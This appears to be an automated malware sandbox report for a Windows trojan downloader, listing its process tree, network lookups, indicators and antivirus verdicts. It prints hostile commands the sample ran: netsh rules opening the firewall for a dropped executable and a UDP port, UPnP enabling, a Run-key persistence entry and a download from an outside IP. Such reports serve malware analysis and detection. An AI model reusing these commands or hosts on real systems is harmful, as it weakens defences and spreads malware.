Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 15, 2021, 12:30 p.m. | Aug. 15, 2021, 12:51 p.m. |
-
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
900-
netsh.exe netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe"
1852 -
netsh.exe netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
2952
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
656 -
-
netsh.exe netsh firewall set service type= upnp mode = enable
2232
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1848
Name | Response | Post-Analysis Lookup |
---|---|---|
stun.jabbim.cz | 88.86.102.51 |
Suricata Alerts
Suricata TLS
No Suricata TLS
pdb_path | gf6d576s4d576f87g98f6d54sd57f67g657s6d576ftgyutfdd6d6u6duyyds5yssd |
packer | Armadillo v1.71 |
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.22/456.exe |
request | GET http://185.215.113.22/456.exe |
ip | 79.141.72.138 |
ip | 79.141.72.156 |
ip | 79.141.72.52 |
ip | 88.86.102.51 |
ip | 88.86.102.52 |
file | C:\Users\test22\AppData\Local\Temp\hhhhhhhhhhh.exe |
cmdline | cmd.exe /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe" |
cmdline | cmd.exe /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480 |
cmdline | "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480 |
cmdline | "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe" |
cmdline | "C:\Windows\System32\cmd.exe" /c netsh firewall set service type= upnp mode = enable |
cmdline | cmd.exe /c netsh firewall set service type= upnp mode = enable |
file | C:\Users\test22\AppData\Local\Temp\hhhhhhhhhhh.exe |
cmdline | netsh firewall set service type= upnp mode = enable |
cmdline | cmd.exe /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe" |
cmdline | cmd.exe /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480 |
cmdline | netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe" |
cmdline | "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480 |
cmdline | "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe" |
cmdline | netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" |
cmdline | netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480 |
cmdline | netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" |
cmdline | "C:\Windows\System32\cmd.exe" /c netsh firewall set service type= upnp mode = enable |
cmdline | cmd.exe /c netsh firewall set service type= upnp mode = enable |
host | 185.215.113.22 | |||
host | 79.141.72.138 | |||
host | 79.141.72.156 | |||
host | 79.141.72.52 | |||
host | 88.86.102.52 |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Application Manager | reg_value | C:\Users\test22\Windows Application Manager\winappmgr.exe |
cmdline | cmd.exe /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe" |
cmdline | cmd.exe /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480 |
cmdline | netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe" |
cmdline | "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480 |
cmdline | "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe" |
cmdline | netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" |
cmdline | netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480 |
cmdline | netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" |
file | C:\Users\test22\AppData\Local\Temp\hhhhhhhhhhh.exe:Zone.Identifier |
Lionic | Trojan.Win32.Generic.4!c |
Elastic | malicious (high confidence) |
DrWeb | Trojan.DownLoader41.11535 |
MicroWorld-eScan | Trojan.GenericKD.37397742 |
FireEye | Generic.mg.627fc88e4e32885e |
Qihoo-360 | Win32/Trojan.Generic.HwcBQD8A |
ALYac | Gen:Heur.Mint.Zard.39 |
Cylance | Unsafe |
Sangfor | Trojan.Win32.Save.a |
Alibaba | Trojan:Win32/XPACK.a375ca36 |
Cybereason | malicious.e4e328 |
BitDefenderTheta | Gen:NN.ZexaF.34058.auW@aGHFmWdi |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of Generik.ENSYFDJ |
APEX | Malicious |
Paloalto | generic.ml |
Kaspersky | HEUR:Trojan.Win32.Generic |
BitDefender | Trojan.GenericKD.37397742 |
Avast | Win32:Malware-gen |
Rising | Trojan.Generic@ML.100 (RDMK:pENf5AL3BElD7ufUbstsaw) |
Ad-Aware | Trojan.GenericKD.37397742 |
Sophos | Mal/Generic-S |
McAfee-GW-Edition | BehavesLike.Win32.Generic.zt |
Emsisoft | Trojan.GenericKD.37397742 (B) |
SentinelOne | Static AI - Malicious PE |
Webroot | W32.Malware.Gen |
Avira | TR/Crypt.XPACK.Gen |
MAX | malware (ai score=100) |
Kingsoft | Win32.Troj.Undef.(kcloud) |
Microsoft | Trojan:Win32/Sabsik.FL.B!ml |
Gridinsoft | Trojan.Win32.Downloader.oa |
Arcabit | Trojan.Generic.D23AA4EE |
GData | Trojan.GenericKD.37397742 |
Cynet | Malicious (score: 100) |
Acronis | suspicious |
McAfee | RDN/Generic.grp |
VBA32 | suspected of Trojan.Downloader.gen |
TrendMicro-HouseCall | TROJ_GEN.R002H0CHD21 |
Tencent | Win32.Trojan.Generic.Wncx |
Ikarus | Trojan.Crypt |
Fortinet | W32/PossibleThreat |
AVG | Win32:Malware-gen |
Panda | Trj/GdSda.A |
CrowdStrike | win/malicious_confidence_100% (W) |